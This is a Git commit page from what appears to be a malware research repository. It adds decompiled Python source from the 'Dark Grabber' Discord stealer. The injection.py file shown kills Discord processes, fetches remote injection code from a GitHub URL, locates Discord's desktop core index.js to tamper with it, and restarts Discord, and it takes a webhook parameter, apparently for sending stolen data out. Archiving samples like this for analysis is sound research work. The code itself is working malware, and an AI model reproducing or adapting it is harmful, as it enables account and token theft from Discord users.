patate/Malware-Research
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add: annexe pour les fichiers de dark grabber

Browse Source
This commit is contained in:
ALittlePatate
2023-01-02 16:25:26 +01:00
parent 6f4f5eba33
commit 6855199913
9 changed files with 1249 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

56
Random/Dark Grabber/Annexes/injection.py Executable file
View File

@@ -0,0 +1,56 @@
# Source Generated with Decompyle++
# File: injection.pyc (Python 3.10)
import os
import re
import subprocess
import psutil
import requests
class Injection:
def __init__(self = None, webhook = None):
self.appdata = os.getenv('LOCALAPPDATA')
self.discord_dirs = [
self.appdata + '\\Discord',
self.appdata + '\\DiscordCanary',
self.appdata + '\\DiscordPTB',
self.appdata + '\\DiscordDevelopment']
self.code = requests.get('https://github.com/GMB-ZKG/stealer-3666/blob/main/src/components/injection.py').text
for proc in psutil.process_iter():
if 'discord' in proc.name().lower():
proc.kill()
# WARNING: Decompyle incomplete
def get_core(self = None, dir = None):
for file in os.listdir(dir):
if re.search('app-+?', file):
modules = dir + '\\' + file + '\\modules'
if not os.path.exists(modules):
continue
for file in os.listdir(modules):
if re.search('discord_desktop_core-+?', file):
core = modules + '\\' + file + '\\' + 'discord_desktop_core'
if not os.path.exists(core + '\\index.js'):
continue
return (core, file)
return None
def start_discord(self = None, dir = None):
update = dir + '\\Update.exe'
executable = dir.split('\\')[-1] + '.exe'
for file in os.listdir(dir):
if re.search('app-+?', file):
app = dir + '\\' + file
if os.path.exists(app + '\\' + 'modules'):
for file in os.listdir(app):
if file == executable:
executable = app + '\\' + executable
subprocess.call([
update,
'--processStart',
executable], True, subprocess.PIPE, subprocess.PIPE, **('shell', 'stdout', 'stderr'))